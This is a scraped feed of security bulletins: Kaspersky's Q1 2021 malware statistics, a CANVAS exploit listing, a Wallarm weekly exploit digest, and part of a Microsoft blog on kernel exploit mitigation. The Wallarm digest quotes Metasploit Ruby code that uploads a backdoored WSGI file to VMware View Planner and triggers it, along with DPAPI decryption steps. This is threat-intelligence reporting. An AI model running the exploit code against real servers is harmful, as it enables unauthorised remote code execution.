was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2017-01-11T18:07:43", "edition": 2, "description": "**Name**| ms16_135 \n---|--- \n**CVE**| CVE-2016-0099 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS16-135 SetWindowLongPtr Vulnerability \n**Notes**| CVE Name: CVE-2016-0099 \nVENDOR: Microsoft \nNotes: \nThe vulnerable (and now patched) function is actually xxxNextWindow(), but since \nGoogle mentioned SetWindowLongPtr() in their release, we use that name here. \n \nOlder systems are definitely vulnerable, but we have developed/tested on Win10 Anniversary Update for now. \n \nRepeatability: Infinite \nReferences: ['https://technet.microsoft.com/en-us/library/security/ms16-135.aspx', 'https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255 \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T02:00:09", "type": "canvas", "title": "Immunity Canvas: MS16_135", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2016-7255"], "modified": "2016-11-10T02:00:09", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms16_135", "id": "MS16_135", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to our weekly exploit digest! We should say this hasn't been a big week because guys keep producing exploits for the vulnerabilities discovered in the 1st half of March. Nevertheless, we have some new good arrivals for VMware, MS Windows and Win32 to talk about. \n\n### New 4+ scored exploits have arrived for 7 software titles:\n\n * VMware View Planner (v4.6)\n * Win32k ConsoleControl\n * Microsoft Exchange 2019\n * Microsoft Windows Containers DP API\n * SonLogger (v4.2.3.3)\n * LiveZilla Server (v8.0.1.0)\n * CuteNews (v2.1.2)\n\n### Here are the types of new exploiting tools:\n\nFile upload| 2 \n---|--- \nRCE| 1 \nOffset Confusion| 1 \nCryptography Flaw| 1 \nSSRF| 1 \nXSS| 1 \n \n## And the title winners of the week are: \n\n## \n\n## I. The Vicious One\n\n### The title goes to this angry piece of code:\n\n[**VMware View Planner 4.6 Remote Code Execution**](<https://vulners.com/packetstorm/PACKETSTORM:161879>)\n\n[CVE-2021-21978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21978>) \n**Score: CVSS 7.5** \n**Metasploit +**\n \n \n The versions of VMWare View Planner prior to 4.6 Security Patch 1 contain a remote code execution vulnerability (RCE). \n\nThis module exploits an unauthenticated log file upload within the `log_upload_wsgi.py` file, where an unauthorized attacker with network access to View Planner Harness could upload and execute an arbitrary file in the `logupload` web application.\n \n \n def upload_file(content) \n mime = Rex::MIME::Message.new \n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\";filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \n mime.add_part('{\"itrLogPath\":\"/etc/http/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \n res = send_request_cgi( \n 'method' => 'POST', \n 'uri' => normalize_uri(target_uri.path, 'logupload'), \n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n 'data' => mime.to_s \n ) \n ...\n \n\nSuccessful exploitation of this vulnerability can result in RCE as the apache user inside the `apacheServer` Docker container. Let's look how it's realized.\n\nFirst grab the template file from a clean install with a backdoor section added to it. Then fill in the PAYLOAD placeholder with the payload to execute. \n \n \n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded \n\nWhen the things are primed, upload the file to the target.\n \n \n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\nThen use the `OPTIONS` request to trigger the backdoor. Technically this could be any other HTTP method including invalid ones like `BACKDOOR`, but for the stealth you better use a legit one. \n \n \n send_request_cgi( 'method' => 'OPTIONS', 'uri' => normalize_uri(target_uri.path, 'logupload') ) ...\n\n### The second place in this category goes here: \n\n[**Win32k ConsoleControl Offset Confusion**](<https://vulners.com/packetstorm/PACKETSTORM:161880>)\n\n[CVE-2021-1732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732>),[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>) \n**Score: CVSS 7.2 \nMetasploit +**\n \n \n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. \n\nThe flaw exists in how the `WndExtra` field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n* * *\n\n## \n\n## II. The Geek of the Week\n\nIn our not so humble opinion, this one is the coolest thing we saw last week. It is all about Windows Docker Information Disclosure Vulnerability, and since we love our Docker containers, so\n\n### The title goes to this exploit:\n\n[**Microsoft Windows Containers DP API Cryptography Flaw**](<https://vulners.com/packetstorm/PACKETSTORM:161816>)\n\n[CVE-2021-1645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1645>) \n**Score: CVSS 6.1 \nMetasploit +**\n \n \n The Windows Data Protection API (DP API) allows applications to encrypt arbitrary data without managing keys. You can pass any data to the API, and it then returns an encrypted blob, or you can reverse an encrypted blob with DP API to recover the plain text. The cryptographic key used is either tied to the user context or is unique to a machine. There was a design issue with DP API in containers which resulted in DP API using the same key in all Windows containers. Additionally, these keys were public in base-image layers published by Microsoft.\n\nThe above vulnerability applies to both user- and machine-key DP API encryption within Windows Docker containers, we used the machine key encryption in our explanations. Typically, a machine key is tied to a (virtual-)machine. Therefore, a machine is not capable of decrypting data encrypted by an application on another device. However, due to a design matter, DP API machine keys used in containers came from the container images. Since Windows Docker images are based on identical base images, the containers\u2019 DP API keys were the same. As long as the base image is public, the DP API keys were public also.\n\nTherefore, DP API operations performed by any Windows container application were ineffective, as the encryption key that was used is public. That is why organizations that used DP API in Windows Docker containers and relied on it to store encrypted data are in a potentially insecure location and should consider this data as compromised.\n\nLets' see how to make this exploit work. First, start a docker container called Alice on VM1:\n \n \n \\$ docker run --name Alice -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThen, encrypt a file in the Alice container using the powershell script `vault.ps1`: \n \n \n C:\\>powershell.exe -File vault.ps1 -StoreSecret \"This is my secret text\" secret.txt\n C:\\>type secret.txt AQAAA...vJ8aUP9 \n\nStart a docker container Bob on VM2:\n \n \n \\$ docker run --name Bob -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThe next command shows that the file encrypted by Alice on VM1 can be decrypted in the Bob container on VM2:\n \n \n C:\\>powershell.exe -File vault.ps1 secret.txt This is my secret text\n\nNext use the `vault.ps1` PowerShell script from <https://blag.nullteilerfrei.de/2018/01/05/powershell-dpapi-script/>.\n\n* * *\n\n## Other hi-scored exploits published this week: \n\n[**SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)**](<https://vulners.com/packetstorm/PACKETSTORM:161793>)\n\n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \n**Score: CVSS 7.5 \nMetasploit +**\n \n \n This module exploits an unauthenticated arbitrary file upload via insecure POST request.\n\n**[Microsoft Exchange 2019 SSRF / Arbitrary File Write](<https://vulners.com/packetstorm/PACKETSTORM:161846>)**\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) \n**Score: 7.5**\n \n \n This one exploits an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources - one of the four zero-day vulnerabilities in MS Exchange discovered in March.\n\n[**CuteNews 2.1.2 Shell Upload**](<https://vulners.com/packetstorm/PACKETSTORM:161833>)\n\n[CVE-2019-11447](<https://vulners.com/cve/CVE-2019-11447>) \n**Score: CVSS 6.5**\n \n \n An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal.\n\n[**LiveZilla Server 8.0.1.0 Cross Site Scripting**](<https://vulners.com/packetstorm/PACKETSTORM:161867>)\n\n[CVE-2019-12962](<https://vulners.com/cve/CVE-2019-12962>) \n**Score: CVSS 4.3**\n \n \n LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.\n\nThe post [Weekly exploit digest - March, 15-21 - VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API](<https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-21T13:09:00", "type": "wallarmlab", "title": "Weekly exploit digest \u2013 March, 15-21 \u2013 VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-11447", "CVE-2019-12962", "CVE-2021-1645", "CVE-2021-1732", "CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27964"], "modified": "2021-03-21T13:09:00", "id": "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "href": "https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Cyberattacks involving zero-day exploits happen from time to time, affecting different platforms and applications. Over the years, Microsoft security teams have been working extremely hard to address these attacks. While delivering innovative solutions like [Windows Defender Application Guard](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge>), which provides a safe virtualized layer for the Microsoft Edge browser, and [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>), a cloud-based service that identifies breaches using data from built-in Windows 10 sensors, we are hardening the Windows platform with mitigation techniques that can stop exploits of newly discovered and even undisclosed vulnerabilities. As Terry Myerson reiterated in his [blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), we take our commitment to security innovation very seriously.\n\nA key takeaway from the detonation of zero-day exploits is that each instance represents a valuable opportunity to assess how resilient a platform can be\u2014how mitigation techniques and additional defensive layers can keep cyberattacks at bay while vulnerabilities are being fixed and patches are being deployed. Because it takes time to hunt for vulnerabilities and it is virtually impossible to find all of them, such security enhancements can be critical in preventing attacks based on zero-day exploits.\n\nIn this blog, we look at two recent kernel-level zero-day exploits used by multiple activity groups. These kernel-level exploits, based on CVE-2016-7255 and CVE-2016-7256 vulnerabilities, both result in elevation of privileges. Microsoft has promptly fixed the mentioned vulnerabilities in November 2016. However, we are testing the exploits against mitigation techniques delivered in August 2016 with Windows 10 Anniversary Update, hoping to see how these techniques might fare against future zero-day exploits with similar characteristics.\n\n \n\n**CVE** | **Microsoft Update** | **Exploit Type** | **Mitigation in Anniversary Update** \n---|---|---|--- \nCVE-2016-7255 | [MS16-135 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-135>) | Win32k Elevation of Privilege Exploit | Strong validation of tagWND structure \nCVE-2016-7256 | [MS16-132 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-132>) | Open Type Font Exploit | Isolated Font Parsing (AppContainer) \nStronger validation in font parsing \n \n \n\n## CVE-2016-7255 exploit: Win32k elevation of privilege\n\nIn October 2016, the STRONTIUM attack group launched a spear-phishing campaign targeting a small number of think tanks and nongovernmental organizations in the United States. The campaign, also discussed in [the previously mentioned blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), involved the use of the exploit for CVE-2016-7255 in tandem with an exploit for the Adobe Flash Player vulnerability CVE-2016-7855.\n\nThe attack group used the Flash exploit to take advantage of a use-after-free vulnerability and access targeted computers. They then leveraged the type-confusion vulnerability in _win32k.sys_ (CVE-2016-7255) to gain elevated privileges.\n\n### Abusing the tagWND.strName kernel structure\n\nIn this section, we\u2019ll go through the internals of the specific exploit for CVE-2016-7255 crafted by the attacker. We will show how mitigation techniques provided customers with preemptive protection from the exploit, even before the release of the specific update fixing the vulnerability.\n\n\n\n_Figure 1. Exploit and shellcode phases of this attack _\n\n \n\nModern exploits often rely on read-write (RW) primitives to achieve code execution or gain additional privileges. For this exploit, attackers acquire RW primitives by corrupting _tagWND.strName_ kernel structure. This exploit method is a trend discussed in security conferences and visible to those who investigated actual attacks. For example, we detailed similar findings in a [presentation](<https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/OhFlorio-VB2015.pdf>) about the Duqu 2.0 exploit at Virus Bulletin 2015.\n\nBy reverse engineering its code, we found that the Win32k exploit used by STRONTIUM in October 2016 reused the exact same method. The exploit, after the initial Win32k vulnerability, corrupts _tagWND.strName_ structure and uses _SetWindowTextW_ to write arbitrary content anywhere in kernel memory.\n\n\n\n_Figure 2. SetWindowTextW as a write primitive_\n\n \n\nThe exploit abuses this API call to overwrite data of current processes and copy token privileges of the _SYSTEM_. If successful, the exploit enables the victim process\u2014_iexplore.exe_, in this example\u2014to execute with elevated privileges.\n\n\n\n_Figure 3. Internet Explorer with SYSTEM privileges_\n\n \n\n### Mitigating tagWND exploits with stronger validation\n\nTo mitigate the Win32k exploit and similar exploits, the Windows Offensive Security Research Team (OSR) introduced techniques in the Windows 10 Anniversary Update that prevent abusive use of _tagWND.strName_. This mitigation performs additional checks for the base and length fields, making sure that they are in the expected virtual address ranges and are not usable for RW primitives. In our tests on Anniversary Update, exploits using this method to create an RW primitive in the kernel are ineffective. These exploits instead cause exceptions and subsequent blue screen errors.\n\n\n\n_Figure 4. Windows 10 Anniversary Update mitigation on a common kernel write primitive_\n\n \n\nWith the upcoming Windows 10 Creators Update, [Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) introduces numerous forms of generic kernel exploit detection for deeper visibility into targeted attacks leveraging zero-day exploits. Technical details about the enhanced sensor will be shared in a forthcoming blog post.\n\n## CVE-2016-7256 exploit: Open type font elevation of privilege\n\nAs early as June 